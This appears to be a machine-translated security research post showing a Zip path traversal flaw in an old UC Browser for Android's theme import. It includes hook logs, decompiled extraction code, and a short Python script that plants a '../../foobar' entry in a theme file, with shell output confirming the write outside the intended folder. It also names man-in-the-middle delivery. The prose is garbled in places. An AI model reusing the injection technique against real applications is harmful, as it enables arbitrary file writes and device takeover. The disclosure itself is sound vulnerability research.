UC Browser: Thoughts on ZipInputStream

UC Browser: Thoughts on ZipInputStream

Summary

ZipInputStream is just as disappointing to those who don't know ZipInputStream Armageddon (Movie: The End of the World!

 

ZipInputStream's insecure processing of zip files directly results in the final control of the device being handed over to the attacker. The attacker can traverse the entire path and write any data. However, today I am not talking about how to use ZipInputStream. Of course, if you are interested, you can take some time to read Safely extract files from ZipInputStream.

Of course, we should also be careful with the problem code reuse syndrome, which I call "stack overflow": https://gist.github.com/shengoo/11240519. So far, more and more developers have known ZipInputStream errors, leading to endless bugs. Today we will talk about it with the UC browser!

UC Browser for Android

In an old version of UC browser, a feature allows users to download and apply a topic. Everyone should be familiar with this pace .... The topic file itself has a custom extension named "uct". In fact, it is a Zip compressed file.

[~/R&D/uc-browser]> file Deep-Midnight.uctDeep-Midnight.uct: Zip archive data, at least v1.0 to extract

Download a theme file from the UC browser, store it in an external bucket, and then copy it to the data directory of the browser. Here I already know what you want to talk about. These files are indeed downloaded through the browser over HTTP. However, you should note that it also has a function to import data from the local machine.

 

 

 

 

With the tool, we can determine where the topic processing function is used to extract and apply the content of the Zip file:

I/Xposed  ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getInputStream : zipEntry : Orange-Popsicle/config.cfg  I/Xposed  ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getInputStream : StackTrace : com.uc.framework.c.ai : a  I/Xposed  ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getInputStream : StackTrace : com.uc.browser.core.skinmgmt.aa : e  I/Xposed  ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getInputStream : StackTrace : com.uc.browser.core.skinmgmt.aa : handleMessage

Now we can use this information and use Lobotomy surgicalAPI to statically verify a possible BUG:

I/Xposed  ( 4803): com.UCMobile.intl : java.util.zip.ZipInputStream : getNextEntry : Hooked!  I/Xposed  ( 4803): com.UCMobile.intl : java.util.zip.ZipInputStream : getNextEntry : zipEntry : Orange-Popsicle/color.xml  I/Xposed  ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getNextEntry : StackTrace : com.uc.framework.c.ak : a  I/Xposed  ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getNextEntry : StackTrace : com.uc.framework.c.ai : a  ......v0 = v4.append(v0).append("config.cfg").toString();                  v4 = new java.util.zip.ZipFile(p11);                v0 = v4.getEntry(v0);                if(v0 != 0) {                    v7 = v4.getInputStream(v0);                } else {                    v7 = 0;                }                ......

In short, the UC browser uses getNextEntry () to capture every file in the Zip file and write it to/data/com. UCMobile. the appropriate location in the intl/downTheme/theme/Orange-Popsicle folder.

There is absolutely no verification on the Zip file here

root@hammerhead:/data/data/com.UCMobile.intl/downTheme/theme/Orange-Popsicle #  ls -la  -rw------- u0_a76   u0_a76       4736 2015-11-12 14:57 color.xml-rw------- u0_a76   u0_a76        317 2015-11-12 14:57 config.cfg

From now on, attackers can handle the exploit Vulnerability from several different perspectives. Through man-in-the-middle attacks, they can inject a malicious theme file into the HTTP Response of the download function. You can also trick users into downloading a malicious topic and expect them to apply this topic file locally.

First, we need to inject a path traversal in the Zip file, and then put it into the device:

import zipfile  import sysif __name__ == "__main__":      try:        zipFile = zipfile.ZipFile(sys.argv[1], "a", zipfile.ZIP_DEFLATED)        info = zipfile.ZipInfo(sys.argv[1])        zipFile.writestr("../../foobar", "foobar")        zipFile.close()    except IOError as e:        raise e

[~/R&D/uc-browser]> python zip_inject.py Deep-Midnight.uct┌[benjaminwatson@BENWAT-COTP-1] [/dev/ttys003]└[~/R&D/uc-browser]> unzip -l Deep-Midnight.uct......             616  01-21-15 15:27   Deep-Midnight/drawable/webAppFullScreenBtnIcon.png     2848  01-21-15 15:27   Deep-Midnight/drawable/window_1.png     1368  01-21-15 15:27   Deep-Midnight/drawable/window_1_patchdrawable.xml         6  11-12-15 15:30   ../../foobar

Once this topic file is selected and applied from the external storage, we can see that the data has been successfully written.

 

 

root@hammerhead:/data/data/com.UCMobile.intl # ls  StartedFlagFile  UCMobile  app_external  app_webview  bannerimages  cache  com  coredata  crash  databases  downTheme  downWallpaper  files  foobar <- Success!  lib  scrollParams.config  searchimages  shared_prefs  stats_offline  user  wa

Conclusion

The cause of these bugs is that the Zip content is not verified. In most cases, some developers do not know what to think, and the default Zip file will not be tampered with, so they will not consider the consequences of this.